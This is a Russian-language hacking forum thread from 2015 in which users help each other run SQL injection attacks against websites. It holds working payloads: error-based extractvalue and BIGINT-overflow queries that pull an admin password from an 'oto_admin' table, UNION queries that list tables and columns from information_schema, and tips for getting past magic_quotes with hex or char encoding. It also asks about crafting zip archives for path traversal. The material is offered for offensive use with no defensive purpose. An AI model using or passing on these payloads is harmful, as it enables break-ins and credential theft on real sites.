 |
|
05.02.2015, 02:12
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами:
7231286
Репутация:
0
|
|
Сообщение от YaBtr
При
слепых!
инъекциях Вы и не увидите вывода. Играетесь с boolean-query. В Вашем случае при истине возвращается страница /renew.php?id=1, в обратном же случае начальная страница авторизации.
всё, понятно ) Слепая же. Спасибо !!!
|
|
|
05.02.2015, 10:18
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
блин, вот так выводится 31 символ ?id=1+|(extractvalue(1,concat(0x3a,(SELECT password FROM oto_admin LIMIT 1)))) ,как вывести последний символ? LIMIT 1,1 пустая страница
|
|
|
|
05.02.2015, 10:41
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от madam
блин, вот так выводится 31 символ ?id=1+|(extractvalue(1,concat(0x3a,(SELECT password FROM oto_admin LIMIT 1)))) ,как вывести последний символ? LIMIT 1,1 пустая страница
SELECT mid(password, 31,32) FROM oto_admin LIMIT 1
|
|
|
|
05.02.2015, 10:44
|
|
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами:
6384566
Репутация:
1
|
|
Сообщение от faza02
SELECT mid(password,
31,32
) FROM oto_admin LIMIT 1
спасибо)
|
|
|
|
05.02.2015, 12:04
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от madam
блин, вот так выводится 31 символ ?id=1+|(extractvalue(1,concat(0x3a,(SELECT password FROM oto_admin LIMIT 1)))) ,как вывести последний символ? LIMIT 1,1 пустая страница
Данные векторы потихоньку уходят в прошлое. Если версия форка позволяет, используйте вектор с наибольшим количеством вывода символов ( 475! error-based через begint):
Сообщение от None
?id=1+|(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (SELECT password FROM oto_admin LIMIT 1)i)a)
Пример: /showpost.php?p=3815102&postcount=23814
|
|
|
|
05.02.2015, 22:42
|
|
Новичок
Регистрация: 29.12.2010
Сообщений: 1
С нами:
8089526
Репутация:
2
|
|
Есть уязвимый скрипт, который производит распаковку zip-архива, загруженного пользователем.
Можно ли создать zip-архив, который бы распаковывался, например, на диреторию више ("../") ?
Вроде видел пример создания такого архива, но не могу найти.
|
|
|
|
06.02.2015, 17:48
|
|
Новичок
Регистрация: 23.09.2010
Сообщений: 5
С нами:
8229206
Репутация:
0
|
|
вопрос от начинающего
база 5.0.95
вот так вывожу таблицы http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group _concat(table_name),5,6+from+information_schema.ta bles--
нахожу нужную мне таблицу например у меня modx_active_users -
делаю так http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group _concat(column_name),5,6+from+information_schema.c olumns+where+table_name='modx_active_users'--
и получаю такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'modx_active_users\\\'--' at line 1
так как начинающий я непойму что делаю нетак!?
|
|
|
|
06.02.2015, 17:57
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от izzy
вопрос от начинающего
база 5.0.95
вот так вывожу таблицы http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group _concat(table_name),5,6+from+information_schema.ta bles--
нахожу нужную мне таблицу например у меня modx_active_users -
делаю так http://www.site.com/news/readnews.php?id=2+and+1=0+union+select+1,2,3,group _concat(column_name),5,6+from+information_schema.c olumns+where+table_name='modx_active_users'--
и получаю такую ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'modx_active_users\\\'--' at line 1
так как начинающий я непойму что делаю нетак!?
Скорее всего magic_quotes_gpc = on
Используйте hex или char.
|
|
|
|
06.02.2015, 18:03
|
|
Новичок
Регистрация: 01.09.2012
Сообщений: 28
С нами:
7208246
Репутация:
0
|
|
стоит фильтрация на ( и ). пробовал обойти с помощью urlencode — не вышло
что предпринять можно?
|
|
|
|
06.02.2015, 18:04
|
|
Новичок
Регистрация: 23.09.2010
Сообщений: 5
С нами:
8229206
Репутация:
0
|
|
большое спасибо помог - char
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
